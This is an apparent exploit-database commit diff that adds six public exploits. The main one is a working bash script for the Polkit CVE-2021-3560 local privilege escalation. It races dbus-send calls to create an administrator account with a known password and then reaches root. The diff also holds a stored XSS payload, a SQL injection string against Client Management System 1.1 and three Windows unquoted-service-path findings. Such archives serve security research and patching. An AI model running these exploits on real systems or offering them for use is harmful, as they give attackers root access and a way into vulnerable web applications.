DB: 2021-06-16

6 changes to exploits/shellcodes Brother BRPrint Auditor - 'Multiple' Unquoted Service Path SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path Polkit 0.105-26 0.117-2 - Local Privilege Escalation Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS) Client Management System 1.1 - 'Search' SQL Injection
2021-06-16 05:01:56 +00:00 · 2021-06-16 05:01:56 +00:00 · 6406244acc
commit 6406244acc
parent fe5d7c9048
7 changed files with 222 additions and 0 deletions
--- a/exploits/linux/local/50011.sh
+++ b/exploits/linux/local/50011.sh
@ -0,0 +1,71 @@
+# Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation
+# Date: 06/11/2021
+# Exploit Author: J Smith (CadmusofThebes)
+# Vendor Homepage: https://www.freedesktop.org/
+# Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html
+# Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora)
+# Tested on: Ubuntu 20.04, Fedora 33
+# CVE: CVE-2021-3560
+# Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/
+
+#!/bin/bash
+
+# Set the name and display name
+userName="hacked"
+realName="hacked"
+
+# Set the account as an administrator
+accountType=1 
+
+# Set the password hash for 'password' and password hint
+password='$5$WR3c6uwMGQZ/JEZw$OlBVzagNJswkWrKRSuoh/VCrZv183QpZL7sAeskcoTB'
+passHint="password"
+
+# Check Polkit version
+polkitVersion=$(systemctl status polkit.service | grep version | cut -d " " -f 9)
+if [[ "$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)" -ge 1 || "$(yum list installed | grep polkit | grep -c 0.117-2)" ]]; then
+    echo "[*] Vulnerable version of polkit found"
+else
+    echo "[!] WARNING: Version of polkit might not vulnerable"
+fi
+
+# Validate user is running in SSH instead of desktop terminal
+if [[ -z $SSH_CLIENT || -z $SSH_TTY ]]; then
+    echo "[!] WARNING: SSH into localhost first before running this script in order to avoid authentication prompts"
+    exit
+fi
+
+# Test the dbus-send timing to load into exploit
+echo "[*] Determining dbus-send timing"
+realTime=$( TIMEFORMAT="%R"; { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType ; } 2>&1 | cut -d " " -f6 )
+halfTime=$(echo "scale=3;$realTime/2" | bc)
+
+# Check for user first in case previous run of script failed on password set
+if id "$userName" &>/dev/null; then
+    userid=$(id -u $userName)
+    echo "[*] New user $userName already exists with uid of $userid"
+else
+    userid=""
+	echo "[*] Attempting to create account"
+    while [[ $userid == "" ]]
+    do
+        dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null
+        if id "$userName" &>/dev/null; then
+	    userid=$(id -u $userName)
+            echo "[*] New user $userName created with uid of $userid"
+        fi
+    done
+fi
+
+# Add the password to /etc/shadow
+echo "[*] Adding password to /etc/shadow"
+x=0
+while [ $x -lt 100 ]
+do 
+    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$userid org.freedesktop.Accounts.User.SetPassword string:$password string:$passHint 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null
+    x=$(($x + 1))
+done
+
+echo "[*] Exploit complete! If the password does not work, run the exploit again"
+echo ""
+echo "[*] Run 'su - $userName', followed by 'sudo su' to gain root access"
--- a/exploits/php/webapps/50007.txt
+++ b/exploits/php/webapps/50007.txt
@ -0,0 +1,20 @@
+# Exploit Title: Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)
+# Date: 14 June 2021
+# Exploit Author: BHAVESH KAUL
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/
+# Version: 1.1
+# Tested on: Server: XAMPP
+
+# Description #
+
+Client Management System 1.1 is vulnerable to stored cross site scripting because of insufficient user supplied data sanitization. 
+
+# Proof of Concept (PoC) : Exploit #
+
+1) Goto: http://localhost/clientms/admin/index.php
+2) Login as admin using test credentials: admin/Test@123
+3) Goto: http://localhost/clientms/admin/admin-profile.php
+4) Enter the following payload in the user name field: <script>alert(1)</script>
+5) Click on Update
+6) Our payload is fired and stored
--- a/exploits/tru64/webapps/50008.txt
+++ b/exploits/tru64/webapps/50008.txt
@ -0,0 +1,19 @@
+# Exploit Title: Client Management System 1.1 - 'Search' SQL Injection
+# Date: 14 June 2021
+# Exploit Author: BHAVESH KAUL
+# Vendor Homepage: https://phpgurukul.com
+# Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/
+# Version: 1.1
+# Tested on: Server: XAMPP
+
+# Description #
+
+Client Management System 1.1 is vulnerable to SQL Injection in the admin panel 'search invoices' field because of insufficient user supplied data sanitization.
+
+# Proof of Concept (PoC) : Exploit #
+
+1) Goto: http://localhost/clientms/admin/index.php
+2) Login as admin using test credentials: admin/Test@123
+3) Goto: http://localhost/clientms/admin/search-invoices.php
+4) Enter the following payload in the search field: ' OR 'x'='x
+5) All results are showed instead of none ==> SQL Injection success
--- a/exploits/windows/local/50005.txt
+++ b/exploits/windows/local/50005.txt
@ -0,0 +1,48 @@
+# Exploit Title: Brother BRPrint Auditor 3.0.7 - 'Multiple' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 14-06-2021
+# Vendor Homepage: https://support.brother.com/
+# Software Links: https://support.brother.com/g/b/downloadhowto.aspx?c=us&lang=en&prod=dcp7060d_all&os=10013&dlid=dlf102753_000&flang=4&type3=214
+# Tested Version: 3.0.7
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+BrPrAuSvc     BrAuSvc      C:\Program Files
+(x86)\Brother\BRPrintAuditor\Brsvau3a.exe       Auto
+
+Brother BRPrintAuditor Agent     BRPA_Agent   C:\Program Files
+(x86)\Brother\BRPrintAuditor\BRAgtSrv.exe    Auto
+
+C:\Users\IEUser>sc qc BrAuSvc
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: BrAuSvc
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files
+(x86)\Brother\BRPrintAuditor\Brsvau3a.exe
+        GRUPO_ORDEN_CARGA  : BrotherSplGroup
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : BrPrAuSvc
+        DEPENDENCIAS       : Spooler
+        NOMBRE_INICIO_SERVICIO: LocalSystem
+
+C:\Users\IEUser>sc qc BRPA_Agent
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: BRPA_Agent
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files
+(x86)\Brother\BRPrintAuditor\BRAgtSrv.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Brother BRPrintAuditor Agent
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
--- a/exploits/windows/local/50009.txt
+++ b/exploits/windows/local/50009.txt
@ -0,0 +1,28 @@
+# Exploit Title: SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 14-06-2021
+# Vendor Homepage:  https://www.sysgauge.com
+# Software Link: https://www.sysgauge.com/setups/sysgaugesrv_setup_v7.9.18.exe
+# Tested Version: 7.9.18
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+
+C:\>sc qc "SysGauge Server"
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: SysGauge Server
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 0   IGNORE
+        NOMBRE_RUTA_BINARIO: C:\Program Files\SysGauge
+Server\bin\sysgaus.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : SysGauge Server
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
--- a/exploits/windows/local/50010.txt
+++ b/exploits/windows/local/50010.txt
@ -0,0 +1,30 @@
+# Exploit Title: Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path
+# Discovery by: Brian Rodriguez
+# Date: 14-06-2021
+# Vendor Homepage: https://brother.com
+# Software Link: https://support.brother.com/g/b/downloadhowto.aspx?c=us&lang=en&prod=ads1000w_us&os=10013&dlid=dlf002778_000&flang=4&type3=46
+# Tested Version: 1.38
+# Vulnerability Type: Unquoted Service Path
+# Tested on: Windows 10 Enterprise 64 bits
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
+|findstr /i /v "c:\windows\\" |findstr /i /v """
+Brother BRAgent    WBA_Agent_Client   C:\Program Files
+(x86)\Brother\BRAgent\BRAgtSrv.exe   Auto
+
+C:\>sc qc WBA_Agent_Client
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: WBA_Agent_Client
+        TIPO               : 10  WIN32_OWN_PROCESS
+        TIPO_INICIO        : 2   AUTO_START
+        CONTROL_ERROR      : 1   NORMAL
+        NOMBRE_RUTA_BINARIO: C:\Program Files
+(x86)\Brother\BRAgent\BRAgtSrv.exe
+        GRUPO_ORDEN_CARGA  :
+        ETIQUETA           : 0
+        NOMBRE_MOSTRAR     : Brother BRAgent
+        DEPENDENCIAS       :
+        NOMBRE_INICIO_SERVICIO: LocalSystem
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11364,6 +11364,10 @@ id,file,description,date,author,type,platform,port
 49997,exploits/windows/local/49997.txt,"Spy Emergency 25.0.650 - 'Multiple' Unquoted Service Path",2021-06-14,"Erick Galindo",local,windows,
 49999,exploits/windows/local/49999.txt,"WibuKey Runtime 6.51 - 'WkSvW32.exe' Unquoted Service Path",2021-06-14,"Brian Rodriguez",local,windows,
 50004,exploits/windows/local/50004.txt,"Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path",2021-06-14,"Brian Rodriguez",local,windows,
+50005,exploits/windows/local/50005.txt,"Brother BRPrint Auditor - 'Multiple' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows,
+50009,exploits/windows/local/50009.txt,"SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows,
+50010,exploits/windows/local/50010.txt,"Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path",2021-06-15,"Brian Rodriguez",local,windows,
+50011,exploits/linux/local/50011.sh,"Polkit 0.105-26 0.117-2 - Local Privilege Escalation",2021-06-15,"J Smith",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -44159,3 +44163,5 @@ id,file,description,date,author,type,platform,port
 49995,exploits/php/webapps/49995.txt,"Small CRM 3.0 - 'Authentication Bypass' SQL Injection",2021-06-14,"BHAVESH KAUL",webapps,php,
 49996,exploits/php/webapps/49996.txt,"TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated)",2021-06-14,"Mert Daş",webapps,php,
 49998,exploits/php/webapps/49998.py,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated)",2021-06-14,"Ron Jost",webapps,php,
+50007,exploits/php/webapps/50007.txt,"Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)",2021-06-15,"BHAVESH KAUL",webapps,php,
+50008,exploits/tru64/webapps/50008.txt,"Client Management System 1.1 - 'Search' SQL Injection",2021-06-15,"BHAVESH KAUL",webapps,tru64,